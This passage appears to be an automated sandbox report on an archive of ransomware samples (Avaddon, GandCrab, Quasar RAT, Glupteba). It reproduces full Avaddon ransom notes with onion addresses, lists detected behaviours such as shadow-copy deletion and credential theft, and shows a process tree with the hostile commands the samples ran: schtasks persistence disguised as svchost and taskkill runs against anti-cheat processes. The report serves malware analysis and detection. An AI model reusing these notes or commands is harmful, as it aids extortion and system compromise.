O/UidwCu1Nc/aAdo40Q3x2LTruFzHGWuImFr/0y8Tvod2vpMQQ5UYs1UrZ060zwOt0odJixUtW0cNF4TQNHaeA0SCsp2NxD6d9DYtBEoYJ9QTGZy8hgT07QtJNLg= ---END GANDCRAB KEY--- ---BEGIN PC DATA--- wfKD6iudumBkmpL8IRr4U4exEVaoOXLtwDwmOrT1y1YWvOiWMx5GYaRdvZZQToJRs3YT7nZWqbfTTGSHhh5qBJzzs9MC7736UkGSDDniUJJG8/LFF//kmGmoAZAGLo2j5/wd2UrxMJK+iqKhTkS3ArgAxrZOOOiXrbnhbWMkLHQnbYuWlMClYZxYU6SDxpopRo5r292AV1KIZBZV4APBuUHcKSIr2MWMI0O1MKIP2IpKLE2TS5wNmoQoAHZIP7k/TfrG1tVzlDb3jcZAB3gql9dnWN0lCD4xdg7bDNQrvH1xSi3FCw+6kfktKtizqdynr7r154JiurEmkUXB6eLy/zU2QOshGtxYOVqCBiXtqhHeEY0b9ycR4tq4Mqb3Y5NyPYz32XaispQRTRkqF1PXJPcJ15EHwNAoARPLnK8+Au5ZALyfhGEwg6hrKQ3vxBFKwg70Zi7pARFF3vzLNuat1wUZOXQRRleKYDmn1lvgAn90mSDf7SyGQSZnn7Ivlsuw7HIKVYbpfzf2fBccdMBnP2lNhH9XQ3DC3KZBEuTtKkioBZVMB5H/HuwOBb+mRawP0IkRV6Du57PMzMP9PnYNh8kz6+xMReJtXf/fbj3WtuITXpleN9Qv9FRhY1KJ2rNgk2neLVYzjwtHfiL5TGExiWYEmrIOT7TbEgFwKc//izM+dDc38W5cffSUv3JpLfS8RB0NXb0DFtZxjWPfxwrBwnounsV5mNrglYqoOg== ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/9fca77e1278df339

Extracted

Path

C:\Users\Admin\Desktop\tvov5Gi3_readme.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aAbDBDaCcc You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- Mzc3LVA5Y05OZEVQRW9IU014bmFEYkRYMlJSeStKTzRqcnFQRWUxVEsvUjA3RmFyZExLN2hpM1Bhb3g5MUV4THBuWTAyTVBsWlJhTEY0ZFE0ODhvclhPWXU2TytPdG1hV3lCU0djQjJDeERzV2ppQm1XM0V1WGVhN0dCa0JmT01xRGJBU2xGRFNybi9CRVJIa1pCektTSjk3LzZCdEFReEMvZkxOcDZxNHY2TjFSWSswOFRKeWg3dE15TSsvc1JFRitVQUZWclU1KzJtb1A2Q0JoWnFia2k0bUs0MUwwSEgyZEdqV3k4bUZVRm16bnJVT2tWVllNYzdEUFhqc1plOXhZQmlCeDhsYzNzdUh6ekVqWmVLSzIyamJsN3hOLzF6aHVobTY5Z0hscmZZVG95SDIwMlRiM1BIektjQlNUMG8xa0l0emU1SkhMMi9KUWdDL0x5UW1pYm9KS01EODlmaDJPQlUxVm5BZHd3T1ZZMUVsMHhmbkxxQVA4L1pKNldNbEJRdUJINEU0bmdkVXVaM1NjbE1iTHUrQUovZ3AxUWs2S0VUREJMcTZ0c2R0NU02WC82RWRBdkFNVlNXenRxNFlKVnExYlNXeEpDdEdxOVlaR251ZWRrODlpaDd6MUQxNFRaTEVpb0g1dXNGMWJ1U2lkVG9PWmhhTDUrcDY0K2wxL09DQnVjOUZEdUtkbXpzWE5Hb0NROE56bTdSVWRrLytNOFJtd2szTlVUK2RSZUZ6cE0wR1BFUWNETkpTNHlPN0tzNWZaUUhQWTB5cllnYWkrU3ZEL0pucFU1bVFIaUt5SG5vUllxNS8vTHF4dFdMQlZuT3dHRVB1R2l5MXozVmxURVN5SEF3ZSt4ZWQzTUFVbldRZW52Vko2c3BXL2MvWktHMFdVaHNBTTM2dmJ0WVRDZHZzcUNtSTg1RzN4OEErTXFvaW1FQUxURERoZmFmVmpHclYxYmI0bjdMNVQ3U0tMSVc0T1RleGU4Ni9rSUtrdXVKcUlCYW1MSWlvNWNvSGFQZjhQaGxHdUJBTyt0SlBLRFdscFlTMTV1eEszekdyQWg1a29rWkhkanE3SkZWWG5IUFFrWDUvSm1MbHAzRndXTEkyM25CbGxhdjgwWTdzWjk5QS9LY1V3Qm5LaEtQanY4TjdLM1ZVeURMNDdkZ0d3eDF1MTNXLzlLcnRuSTV3VUQ2dTNYQUFmZFZIQXErZUVMcHc3TVRwcmZEKzE1S044NXh6d3BYbkNFa3JiM056dzFLSm1ndE9ZQk9UU2hza0dFK0NwOHhpWjh1WmFUT2s0NkJ0S3d5MXlkOXFodGt2Y2dIY0RVOXV4amFEdHJDeFh5b1dmVWpmYUdYS2E1eER3M3JuSytzeldEZi90c1pOWWlJQktLS0lTaFhaNlp3V0dMcHFXRDc1KzJjQngzaERGQXUzWWVMUUxoL3JVa2MxQXBVT1Z4MElsSXlQOWNFRVBzTzhtRzBxRTVkNHJhMU9McCtpSEJPNWhDVHhVWWp0ZlNjL2xFbGp1UWhoYlJiQWFsVWVXTmFSQ013UTlid1JuVWRkVC9pSExGZWtSNjNGSUMwa3cyMGFFeGQybzBrZXhtV3RmNjV0K3dJdmFUdU9vNmtPLzBYb21FbjhQTjFnNlgvT21DYTNyUEp3MWF0R2UyQU5Dd0xMSTNYTXdoU25GT1pHUVd5WWZQU3RBeDhHY25hL3BhVklPZFlSWkZvOS9INURvaUJKdGJvcnlOZ2dESU1LZk5CRVZxczAvOWpuUGsveDRRV01pUDE4cG1wdkF5MEJhbC9ORCtyd2twVnpYQXFEUEl1VXUrd2NEVDJnS21xZGQzTld5UUs4ekVFaEpsUmwxSFB2R1pSMW1RUkphNTYra2NSYngrcVhxelN4SDhGUUMvZXJZejhNRXpMRUp1TFJqL1l5cENYYkRUNkx3UEQyYzl4bGxOVEd5T29OWHZTVkVDbVYwUml5MkJVQU0ra3hPVXVlRmJZTWdELzRmYWYrR3luTVoyWnVmN1Q2RmgxM1J3ZFpCcldqMi9TNDB0UVlucXo1d3o3UEgrTFdSNGtORVVWL1YrY2JjOFBFcmd5SXBybThmd1ZFOWM4bHorcjEyNHQ2VktPVDhnMHg0TWJ4cjZNMjZqUlhEaERyQW10SmRlaVV2L2V5V1pLSXh6T3NzOWU1NjNIUG5sSHkxQmljUUdmanFxeXhVVHFsS2dm -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * 8zJm3LChWqPo7EfM7Gh8
URLs

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\tvov5Gi3_readme.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aAbDBDaCcc You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- Mzc3LVA5Y05OZEVQRW9IU014bmFEYkRYMlJSeStKTzRqcnFQRWUxVEsvUjA3RmFyZExLN2hpM1Bhb3g5MUV4THBuWTAyTVBsWlJhTEY0ZFE0ODhvclhPWXU2TytPdG1hV3lCU0djQjJDeERzV2ppQm1XM0V1WGVhN0dCa0JmT01xRGJBU2xGRFNybi9CRVJIa1pCektTSjk3LzZCdEFReEMvZkxOcDZxNHY2TjFSWSswOFRKeWg3dE15TSsvc1JFRitVQUZWclU1KzJtb1A2Q0JoWnFia2k0bUs0MUwwSEgyZEdqV3k4bUZVRm16bnJVT2tWVllNYzdEUFhqc1plOXhZQmlCeDhsYzNzdUh6ekVqWmVLSzIyamJsN3hOLzF6aHVobTY5Z0hscmZZVG95SDIwMlRiM1BIektjQlNUMG8xa0l0emU1SkhMMi9KUWdDL0x5UW1pYm9KS01EODlmaDJPQlUxVm5BZHd3T1ZZMUVsMHhmbkxxQVA4L1pKNldNbEJRdUJINEU0bmdkVXVaM1NjbE1iTHUrQUovZ3AxUWs2S0VUREJMcTZ0c2R0NU02WC82RWRBdkFNVlNXenRxNFlKVnExYlNXeEpDdEdxOVlaR251ZWRrODlpaDd6MUQxNFRaTEVpb0g1dXNGMWJ1U2lkVG9PWmhhTDUrcDY0K2wxL09DQnVjOUZEdUtkbXpzWE5Hb0NROE56bTdSVWRrLytNOFJtd2szTlVUK2RSZUZ6cE0wR1BFUWNETkpTNHlPN0tzNWZaUUhQWTB5cllnYWkrU3ZEL0pucFU1bVFIaUt5SG5vUllxNS8vTHF4dFdMQlZuT3dHRVB1R2l5MXozVmxURVN5SEF3ZSt4ZWQzTUFVbldRZW52Vko2c3BXL2MvWktHMFdVaHNBTTM2dmJ0WVRDZHZzcUNtSTg1RzN4OEErTXFvaW1FQUxURERoZmFmVmpHclYxYmI0bjdMNVQ3U0tMSVc0T1RleGU4Ni9rSUtrdXVKcUlCYW1MSWlvNWNvSGFQZjhQaGxHdUJBTyt0SlBLRFdscFlTMTV1eEszekdyQWg1a29rWkhkanE3SkZWWG5IUFFrWDUvSm1MbHAzRndXTEkyM25CbGxhdjgwWTdzWjk5QS9LY1V3Qm5LaEtQanY4TjdLM1ZVeURMNDdkZ0d3eDF1MTNXLzlLcnRuSTV3VUQ2dTNYQUFmZFZIQXErZUVMcHc3TVRwcmZEKzE1S044NXh6d3BYbkNFa3JiM056dzFLSm1ndE9ZQk9UU2hza0dFK0NwOHhpWjh1WmFUT2s0NkJ0S3d5MXlkOXFodGt2Y2dIY0RVOXV4amFEdHJDeFh5b1dmVWpmYUdYS2E1eER3M3JuSytzeldEZi90c1pOWWlJQktLS0lTaFhaNlp3V0dMcHFXRDc1KzJjQngzaERGQXUzWWVMUUxoL3JVa2MxQXBVT1Z4MElsSXlQOWNFRVBzTzhtRzBxRTVkNHJhMU9McCtpSEJPNWhDVHhVWWp0ZlNjL2xFbGp1UWhoYlJiQWFsVWVXTmFSQ013UTlid1JuVWRkVC9pSExGZWtSNjNGSUMwa3cyMGFFeGQybzBrZXhtV3RmNjV0K3dJdmFUdU9vNmtPLzBYb21FbjhQTjFnNlgvT21DYTNyUEp3MWF0R2UyQU5Dd0xMSTNYTXdoU25GT1pHUVd5WWZQU3RBeDhHY25hL3BhVklPZFlSWkZvOS9INURvaUJKdGJvcnlOZ2dESU1LZk5CRVZxczAvOWpuUGsveDRRV01pUDE4cG1wdkF5MEJhbC9ORCtyd2twVnpYQXFEUEl1VXUrd2NEVDJnS21xZGQzTld5UUs4ekVFaEpsUmwxSFB2R1pSMW1RUkphNTYra2NSYngrcVhxelN4SDhGUUMvZXJZejhNRXpMRUp1TFJqL1l5cENYYkRUNkx3UEQyYzl4bGxOVEd5T29OWHZTVkVDbVYwUml5MkJVQU0ra3hPVXVlRmJZTWdELzRmYWYrR3luTVoyWnVmN1Q2RmgxM1J3ZFpCcldqMi9TNDB0UVlucXo1d3o3UEgrTFdSNGtORVVWL1YrY2JjOFBFcmd5SXBybThmd1ZFOWM4bHorcjEyNHQ2VktPVDhnMHg0TWJ4cjZNMjZqUlhEaERyQW10SmRlaVV2L2V5V1pLSXh6T3NzOWU1NjNIUG5sSHkxQmljUUdmanFxeXhVVHFsS2dm -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * USA9DQzAFk6r39
URLs

http://avaddonbotrxmuyl.onion

Signatures

  • Avaddon

    Ransomware-as-a-service first released in June 2020 and currently expanding its userbase among criminal actors.

    ransomwareavaddon
  • Avaddon family
    avaddon
  • Avaddon payload 7 IoCs
  • Detected Xorist Ransomware 1 IoCs
  • Disables service(s) 3 TTPs
    evasionexecution
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

    ransomwarebackdoorgandcrab
  • Gandcrab family
    gandcrab
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba family
    glupteba
  • Glupteba payload 3 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Quasar RAT 5 IoCs

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Xorist Ransomware

    Xorist is a ransomware first seen in 2020.

    ransomwarexorist
  • Xorist family
    xorist
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
    evasion
  • Modifies boot configuration data using bcdedit 3 IoCs
  • Renames multiple (2482) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (294) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (457) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (535) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Renames multiple (72) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Modifies Windows Firewall 2 TTPs 3 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

    credential_accessstealer
  • Drops startup file 3 IoCs
  • Executes dropped EXE 38 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs
    defense_evasion
  • Loads dropped DLL 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 7 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Adds Run key to start application 2 TTPs 7 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
    evasiontrojan
  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 39 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 58 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 17 IoCs
    evasion
  • Modifies registry class 17 IoCs
  • Modifies registry key 1 TTPs 33 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 6 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00384.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1128
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Quasar RAT
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5072
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      2⤵
      • Drops startup file
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:872
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Modifies registry class
        PID:6392
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4752
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3560
      • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.MSIL.Blocker.gen-4e2d6c20e77bc5d58a2452cc2b1102816c925528cccb96f7f464aa120f4535e1.exe
        HEUR-Trojan-Ransom.MSIL.Blocker.gen-4e2d6c20e77bc5d58a2452cc2b1102816c925528cccb96f7f464aa120f4535e1.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:372
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.MSIL.Blocker.gen-4e2d6c20e77bc5d58a2452cc2b1102816c925528cccb96f7f464aa120f4535e1.exe" /rl HIGHEST /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3844
        • C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe
          "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:5008
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:6528
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xhRRCvNZO1XY.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:5872
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              6⤵
                PID:7144
              • C:\Windows\SysWOW64\PING.EXE
                ping -n 10 localhost
                6⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:6156
              • C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe
                "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"
                6⤵
                  PID:5908
                  • C:\Windows\SysWOW64\schtasks.exe
                    "schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3372
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E4KGgVbdnYTz.bat" "
                    7⤵
                      PID:4748
                      • C:\Windows\SysWOW64\chcp.com
                        chcp 65001
                        8⤵
                          PID:5980
                        • C:\Windows\SysWOW64\PING.EXE
                          ping -n 10 localhost
                          8⤵
                          • System Network Configuration Discovery: Internet Connection Discovery
                          • Runs ping.exe
                          PID:1364
                        • C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe
                          "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"
                          8⤵
                            PID:7992
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6NWna7oXs6ND.bat" "
                          7⤵
                            PID:8124
                            • C:\Windows\SysWOW64\chcp.com
                              chcp 65001
                              8⤵
                                PID:5300
                              • C:\Windows\SysWOW64\PING.EXE
                                ping -n 10 localhost
                                8⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:3464
                              • C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe
                                "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"
                                8⤵
                                  PID:6624
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    "schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f
                                    9⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:7340
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1PTTGyRMKqFR.bat" "
                                    9⤵
                                      PID:7224
                                      • C:\Windows\SysWOW64\chcp.com
                                        chcp 65001
                                        10⤵
                                          PID:7580
                                        • C:\Windows\SysWOW64\PING.EXE
                                          ping -n 10 localhost
                                          10⤵
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          • Runs ping.exe
                                          PID:7868
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mr7rjcq3vS0Y.bat" "
                                        9⤵
                                          PID:7872
                                          • C:\Windows\SysWOW64\chcp.com
                                            chcp 65001
                                            10⤵
                                              PID:7960
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping -n 10 localhost
                                              10⤵
                                              • System Network Configuration Discovery: Internet Connection Discovery
                                              • Runs ping.exe
                                              PID:6104
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6624 -s 2500
                                            9⤵
                                            • Program crash
                                            PID:6780
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 2452
                                        7⤵
                                        • Program crash
                                        PID:408
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xuU5DRZgbGeT.bat" "
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5936
                                    • C:\Windows\SysWOW64\chcp.com
                                      chcp 65001
                                      6⤵
                                        PID:3796
                                      • C:\Windows\SysWOW64\PING.EXE
                                        ping -n 10 localhost
                                        6⤵
                                        • System Network Configuration Discovery: Internet Connection Discovery
                                        • Runs ping.exe
                                        PID:4180
                                      • C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe
                                        "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"
                                        6⤵
                                          PID:1672
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5008 -s 2272
                                        5⤵
                                        • Program crash
                                        PID:4700
                                  • C:\Users\Admin\Desktop\00384\HEUR-Trojan-Ransom.MSIL.Gen.gen-ca34aa0db41b2e1518866480b454226000efaf57e389f3b1d6deaa8e25cba712.exe
                                    HEUR-Trojan-Ransom.MSIL.Gen.gen-ca34aa0db41b2e1518866480b454226000efaf57e389f3b1d6deaa8e25cba712.exe
                                    3⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:3308
                                    • C:\Windows\explorer.exe
                                      "C:\Windows\explorer.exe"
                                      4⤵
                                      • Modifies registry class
                                      PID:4208
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd.exe"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of WriteProcessMemory
                                      PID:5004
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im UnrealCEFSubProcess.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1596
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im CEFProcess.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1080
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im EasyAntiCheat.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4080
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im BEService.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4060
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im BEServices.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2336
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im BattleEye.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3576
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im epicgameslauncher.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:920
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im FortniteClient-Win64-Shipping_EAC.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        PID:3944
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im FortniteClient-Win64-Shipping.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        PID:3180
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im FortniteClient-Win64-Shipping_BE.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        PID:860
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im FortniteLauncher.exe
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Kills process with taskkill
                                        PID:6860
